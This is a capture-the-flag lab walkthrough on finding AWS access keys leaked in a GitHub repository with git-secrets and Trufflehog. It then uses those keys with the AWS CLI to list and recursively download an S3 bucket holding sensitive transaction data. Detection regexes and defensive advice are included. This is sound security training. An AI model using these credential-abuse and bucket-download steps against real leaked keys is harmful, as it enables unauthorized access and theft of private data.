Overview

Exposed security credentials in Git repositories pose a significant real-world threat, potentially leading to the compromise of individual systems or even entire company networks and platforms.

Today, we will identify access keys within a target GitHub repository and use them to retrieve sensitive data from an S3 bucket.

Credit: Pwnedlabs.io lab.

Requirements / Pre-Requisites

- Installation of git-secrets or Trufflehog.

git-secrets prevents you from accidentally committing passwords, API keys, and other sensitive information to a Git repository. It scans repository contents for predefined patterns, written as regular-expression rules, that typically indicate the presence of sensitive information. When it detects a match, it either raises a warning or, when installed as a Git hook, rejects the commit.
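To make the mechanism concrete, here is a minimal Python sketch of the idea: a line is a violation if it matches a prohibited pattern and no allowed pattern, and a hook blocks the commit by exiting with a non-zero status. The password rule and the CHANGEME exception are hypothetical examples. git-secrets itself is a shell script that keeps its rules in Git config, so this is an approximation of its behavior, not its implementation.

```python
import re
import sys

# Hypothetical rules for illustration only; git-secrets stores its real
# rules in Git config (secrets.patterns / secrets.allowed).
PROHIBITED = [re.compile(r"password\s*=\s*\S+", re.IGNORECASE)]
ALLOWED = [re.compile(r"password\s*=\s*CHANGEME", re.IGNORECASE)]


def violations(text):
    """Return (line_number, line) pairs that match a prohibited pattern
    and are not excused by an allowed pattern."""
    found = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        prohibited = any(p.search(line) for p in PROHIBITED)
        allowed = any(a.search(line) for a in ALLOWED)
        if prohibited and not allowed:
            found.append((lineno, line))
    return found


def pre_commit_check(text):
    """Mimic a pre-commit hook: report each violation on stderr and return
    a non-zero exit status (which makes Git abort the commit) if any exist."""
    found = violations(text)
    for lineno, line in found:
        print(f"{lineno}:{line}", file=sys.stderr)
    return 1 if found else 0
```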

Trufflehog is another tool that automates the discovery of credentials in Git repositories by searching the commit history for regex matches and high-entropy strings.

git clone https://github.com/awslabs/git-secrets

cd git-secrets

make install

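On Debian, install Trufflehog with pip. Recent Debian releases mark the system Python as externally managed, so pip refuses system-wide installs unless you pass --break-system-packages (installing inside a virtual environment avoids the flag):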



pip3 install trufflehog --break-system-packages

- Clone the Pwned Labs test repository:

git clone https://github.com/huge-logistics/cargo-logistics-dev.git

- Finally, make sure the AWS CLI is installed. See the AWS CLI documentation for complete installation instructions.

Using git-secrets to scan the cloned repository

- Navigate to the cloned repository directory, install the git-secrets hooks, and register the AWS patterns:

cd cargo-logistics-dev/



git secrets --install

git secrets --register-aws
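git secrets --register-aws adds AWS-specific prohibited patterns and allow-lists the example keys from the AWS documentation. The sketch below approximates those patterns in Python; treat the regexes as a simplified assumption, and run git secrets --list to see the exact rules your installation registered.

```python
import re

# Simplified approximations of the AWS patterns registered by
# `git secrets --register-aws` (assumption: check `git secrets --list`).
ACCESS_KEY_ID = re.compile(
    r"(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}"
)
SECRET_ACCESS_KEY = re.compile(
    r"[\"']?(AWS|aws|Aws)?_?(SECRET|secret|Secret)?_?(ACCESS|access|Access)?_?"
    r"(KEY|key|Key)[\"']?\s*(:|=>|=)\s*[\"']?[A-Za-z0-9/+=]{40}[\"']?"
)
# Example keys from the AWS documentation are allowed so they never trigger.
ALLOWED = ("AKIAIOSFODNN7EXAMPLE", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY")


def find_aws_secrets(text):
    """Return (line_number, kind) for every line that looks like it holds
    an AWS access key ID or secret access key."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if any(example in line for example in ALLOWED):
            continue  # a whole line is excused if it contains an allowed value
        for kind, pattern in (
            ("access_key_id", ACCESS_KEY_ID),
            ("secret_access_key", SECRET_ACCESS_KEY),
        ):
            if pattern.search(line):
                hits.append((lineno, kind))
    return hits
```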

- Scan all revisions in the repository's history:



git secrets --scan-history
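The history scan tells you which commit introduced a match. A rough way to reproduce that in Python (an approximation, not how git-secrets works internally) is to walk the patch output of git log -p --all and attribute each added line containing an access key ID to its commit and file. The printed commit:path pairs have the same shape that git show expects.

```python
import re
import subprocess

# Simplified AWS access key ID pattern (assumption, see git secrets --list).
ACCESS_KEY_ID = re.compile(
    r"(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}"
)


def scan_patch_log(log_text):
    """Given `git log -p` output, return (commit, path, key_id) for every
    added line that contains something shaped like an access key ID."""
    hits = []
    commit = path = None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("+++ b/"):
            path = line[len("+++ b/"):]
        elif line.startswith("+") and not line.startswith("+++"):
            match = ACCESS_KEY_ID.search(line)
            if match:
                hits.append((commit, path, match.group(0)))
    return hits


if __name__ == "__main__":
    # Run from inside the cloned repository.
    log = subprocess.run(
        ["git", "log", "-p", "--all"],
        capture_output=True, text=True, errors="replace", check=True,
    ).stdout
    for commit, path, key_id in scan_patch_log(log):
        print(f"{commit}:{path}  {key_id}")
```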

- Inspect the flagged file as it existed in that commit, using git show with the <commit>:<path> syntax:



git show d8098af5fbf1aa35ae22e99b9493ffae5d97d58f:log-s3-test/log-upload



Using Trufflehog to scan the cloned repository

trufflehog --regex --entropy=False ./cargo-logistics-dev/


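Besides regex rules, Trufflehog v2 (the Python version that pip installs) can flag high-entropy strings; --entropy=False turns that check off and keeps only regex matches, which cuts down on noise. The sketch below shows what the disabled check measures: Shannon entropy over base64-like tokens. The 4.5 bits-per-character threshold and 20-character minimum are assumptions close to Trufflehog v2's defaults, not values taken from this walkthrough.

```python
import math
from collections import Counter

BASE64_CHARS = set(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
)


def shannon_entropy(s):
    """Bits of entropy per character, based on character frequencies in s."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def high_entropy_tokens(line, threshold=4.5, min_len=20):
    """Return runs of base64 characters at least min_len long whose entropy
    exceeds threshold (both values are assumptions)."""
    tokens, current = [], ""
    for ch in line + " ":  # trailing space flushes the final token
        if ch in BASE64_CHARS:
            current += ch
        else:
            if len(current) >= min_len and shannon_entropy(current) > threshold:
                tokens.append(current)
            current = ""
    return tokens
```

A random 40-character secret key typically scores well above 4.5, while ordinary identifiers and repeated characters stay far below it.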

You can also scan the GitHub repository URL directly, without cloning it locally first:

trufflehog https://github.com/huge-logistics/cargo-logistics-dev --max_depth 2

The scan reveals an AWS access key pair that we can configure in the AWS CLI. Also take note of the S3 bucket name, the source file, and the region where the bucket is located; these details are crucial for our enumeration.



- Configure an AWS CLI profile with the exposed credentials, then confirm which identity they belong to:

aws configure --profile <name of your profile>

aws sts get-caller-identity --profile <name of your profile>


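aws configure --profile NAME stores the access key pair in ~/.aws/credentials under [NAME], and settings such as the region in ~/.aws/config under [profile NAME]. The sketch below renders that layout with configparser to show what the command writes; the keys are the AWS documentation's example values and us-east-1 is a placeholder, not the lab's region.

```python
import configparser
import io


def render_profile(name, access_key_id, secret_access_key, region):
    """Return (credentials_text, config_text) laid out the way the AWS CLI
    stores a named profile in ~/.aws/credentials and ~/.aws/config."""
    creds = configparser.ConfigParser(interpolation=None)
    creds[name] = {
        "aws_access_key_id": access_key_id,
        "aws_secret_access_key": secret_access_key,
    }

    config = configparser.ConfigParser(interpolation=None)
    # In ~/.aws/config, every profile except "default" gets a "profile " prefix.
    section = name if name == "default" else f"profile {name}"
    config[section] = {"region": region}

    out_creds, out_config = io.StringIO(), io.StringIO()
    creds.write(out_creds)
    config.write(out_config)
    return out_creds.getvalue(), out_config.getvalue()


if __name__ == "__main__":
    creds_text, config_text = render_profile(
        "exposed-secret",
        "AKIAIOSFODNN7EXAMPLE",
        "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
        "us-east-1",  # placeholder region
    )
    print(creds_text)
    print(config_text)
```

Because the keys live under a named profile, every later command needs --profile NAME (or the AWS_PROFILE environment variable); without it, the CLI falls back to the default profile.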

- Now, list the contents of the S3 bucket huge-logistics-transact:

aws s3 ls s3://huge-logistics-transact --profile <name of your profile>
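For larger buckets it can help to process the listing in a script. aws s3 ls prints each object as date, time, size in bytes, and key, and prints common prefixes (folders) as PRE lines. A small parser for that output is sketched below; it assumes the default format (no --human-readable), and any sample you feed it here is hypothetical rather than the lab bucket's real contents.

```python
def parse_s3_ls(output):
    """Split `aws s3 ls` output into a list of prefixes and a list of
    (key, size_in_bytes) tuples."""
    prefixes, objects = [], []
    for line in output.splitlines():
        parts = line.split(maxsplit=3)  # maxsplit keeps keys with spaces intact
        if not parts:
            continue
        if parts[0] == "PRE":
            prefixes.append(line.split("PRE", 1)[1].strip())
        elif len(parts) == 4:
            _date, _time, size, key = parts
            objects.append((key, int(size)))
    return prefixes, objects
```

For example, you could pipe the output of aws s3 ls s3://huge-logistics-transact --recursive --profile <name of your profile> into this function to get every key under all prefixes.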

- Copy the contents of the bucket to your local machine using the following command format:



aws s3 cp s3://<bucket name> <destination location on your PC> --profile <your profile name> --recursive

aws s3 cp s3://huge-logistics-transact ./exposed_bucket --profile exposed-secret --recursive



- Finally, view the flag.txt file and the web_transaction.csv file, which contains highly sensitive data.

Defense

Never hardcode AWS credentials in your scripts or code. Instead, store secrets in AWS Secrets Manager, which also lets you rotate them.
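As a minimal sketch of the alternative, assuming boto3 is installed and a JSON secret already exists under the hypothetical name prod/app/db, an application can fetch the secret at runtime with the Secrets Manager get_secret_value call. boto3 finds its own credentials through its default provider chain (environment variables, shared config files, or an attached IAM role), so nothing sensitive lives in the code. The client parameter is a hypothetical hook for injecting a stub in tests.

```python
import json


def load_secret(secret_id, client=None):
    """Fetch a JSON secret from AWS Secrets Manager at runtime and return it
    as a dict, instead of hardcoding the values in source code."""
    if client is None:
        import boto3  # imported lazily so this module loads without boto3

        client = boto3.client("secretsmanager")
    response = client.get_secret_value(SecretId=secret_id)
    return json.loads(response["SecretString"])


if __name__ == "__main__":
    secret = load_secret("prod/app/db")  # hypothetical secret name
    print(sorted(secret))  # print only the field names, never the values
```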

Finally, run git-secrets before committing to your Git repository: once its hooks are installed, it rejects commits that contain credentials. You can also add a git-secrets scan to your CI pipeline so every push is checked automatically.
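A minimal CI gate could look like the sketch below, assuming git-secrets is installed on the build agent and the job runs from the repository root: register the AWS patterns, scan the full history, and fail the job on a non-zero exit status (git-secrets exits non-zero when it finds a match). The run parameter exists only so the logic can be exercised with a stub runner.

```python
import subprocess
import sys


def run_secret_scan(run=subprocess.run):
    """Register the AWS patterns, scan all history, and return the first
    non-zero exit status (or 0 if every command succeeds)."""
    commands = [
        ["git", "secrets", "--register-aws"],
        ["git", "secrets", "--scan-history"],
    ]
    for cmd in commands:
        result = run(cmd)
        if result.returncode != 0:
            print(f"{' '.join(cmd)} exited with {result.returncode}", file=sys.stderr)
            return result.returncode
    return 0


if __name__ == "__main__":
    # A non-zero exit status fails the CI job.
    sys.exit(run_secret_scan())
```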

Refer to the AWS documentation on remediating exposed AWS credentials for further guidance.
